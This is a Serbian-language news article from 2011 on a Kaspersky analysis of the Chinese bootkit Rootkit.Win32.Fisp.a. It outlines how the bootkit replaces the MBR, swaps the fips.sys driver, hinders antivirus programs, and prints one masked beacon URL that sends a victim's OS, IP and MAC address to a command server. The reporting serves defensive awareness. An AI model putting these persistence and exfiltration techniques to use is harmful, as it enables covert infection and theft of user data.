Novi kineski bootkit - Rootkit.Win32.Fisp.a

Opisi virusa, 12.04.2011, 09:27 AM

Novi kineski bootkit  - Rootkit.Win32.Fisp.a

Kaspersky Laboratorija identifikovala je novi štetni program - bootkit, kernel mod rootkit-a koji za sada pogađa samo kineske internet korisnike.

Bootkit nazvan Rootkit.Win32.Fisp.a se distribuira pomoću downloader Trojanca (Trojan-Downloader.NSIS.Agent.jd) koji kompjutere korisnika inficira kada pokušaju da preuzmu video snimak sa kineskog pornografskog sajta.

Među fajlovima koji se preuzimaju pomoću downloader Trojanca nalazi se i dropper Rootkit.Win32.Fisp, štetni fajl koji inficira boot sektor hard diska.

Bootkit snima stari MBR (master boot record) u trećem sektoru i zamenjuje ga sopstvenim. Počev od četvrtog sektora, on instalira enkriptovani drajver i ostatak koda (klikni na sliku radi uvećanja):

Fragment sa početka hard diska zaražen bootkit-om: Rootkit.Win32.Fisp.a

Kada se kompjuter startuje, štetni kod se izvršava i ponovo vraća originalni MBR kako bi se Windows učitao bez opasnosti od otkrivanja bootkit-a.

Kada je određeni deo sistema pokrenut, bootkit presreće funkciju ExVerifySuite. On tada zamenjuje sistemski drajver fips.sys štetnim drajverom koji se nalazi zapisan na početku hard diska u enkriptovanom obliku. Drajver fips.sys nije neophodan kako bi sistem funkcionisao normalno, tako da neće doći do pada sistema kada se ovaj drajver zameni štetnim drajverom.

Drajver detektuje brojne antivirusne programe i ometa ih u onome što bi inače trebalo da rade. Između ostalih, to se dešava AV programima proizvođača TrendMicro, BitDefender, AVG, Symantec, Kasperksy Lab, ESET i nekolicini kineskih programa.

Drajver kompromituje explorer.exe proces i ubacuje u računar varijantu bootkit-a koja takođe ima funkciju downloader-a. Štetni program šalje zahteve ka serveru i prenosi podatke o zaraženom kompjuterskom operativnom sistemu, IP adesi, MAC adresi itd., što izgleda ovako:

http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=192.168.0.16&c=00-00-00-00-00-00&f=

none&g=none&k=a&h=62&i=2&j=0321-01

Između ostalog, rootkit kasnije preuzima Trojan-Dropper.Win32.Vedio.dgs i Trojan-GameThief.Win32, keylogger koji krade podatke korisičkih naloga online igrice LineAge2.

Šematski prikaz infekcije


Prijavite se na našu mailing listu i primajte najnovije vesti (jednom dnevno) putem emaila svakog radnog dana besplatno:

Izdvojeno

Malver TrickBot greškom upozorava žrtve da su zaražene

Malver TrickBot greškom upozorava žrtve da su zaražene

Zloglasni malver TrickBot greškom upozorava žrtve da su zaražene i da treba da se obrate svom administratoru. TrickBot se najčešće širi preko ... Dalje

Za žrtve ransomwarea EvilQuest koji šifruje i krade fajlove sa macOS postoji besplatno rešenje

Za žrtve ransomwarea EvilQuest koji šifruje i krade fajlove sa macOS postoji besplatno rešenje

Loš kod ransomwarea ThiefQuest, koji isključivo inficira macOS uređaje, omogućava vraćanje šifrovanih fajlova, koji bi, da autori malvera nisu ... Dalje

Otkriven novi ransomware koji isključivo inficira macOS

Otkriven novi ransomware koji isključivo inficira macOS

Novi ransomware nazvan OSX.EvilQuest, otkriven ove nedelje, inficira isključivo macOS uređaje. Ono po čemu se razlikuje od drugih ransomwarea za ma... Dalje

Ransomware Sodinokibi (REvil) ima novu taktiku za izvlačenje novca od žrtava

Ransomware Sodinokibi (REvil) ima novu taktiku za izvlačenje novca od žrtava

Grupa koja stoji iza jednog od najuspešnijih ransomwarea sada skenira mreže kompanija kako bi pronašla podatke o platnim karticama, plaćanjima i s... Dalje

Sajber-kriminalci manipulišu Google pretragom da bi širili novi malver za Mac

Sajber-kriminalci manipulišu Google pretragom da bi širili novi malver za Mac

Većina korisnika prilikom pretraživanja interneta je svesna da postoje zlonamerni sajtovi na kojima treba biti oprezan. Ali, za pretraživače Goog... Dalje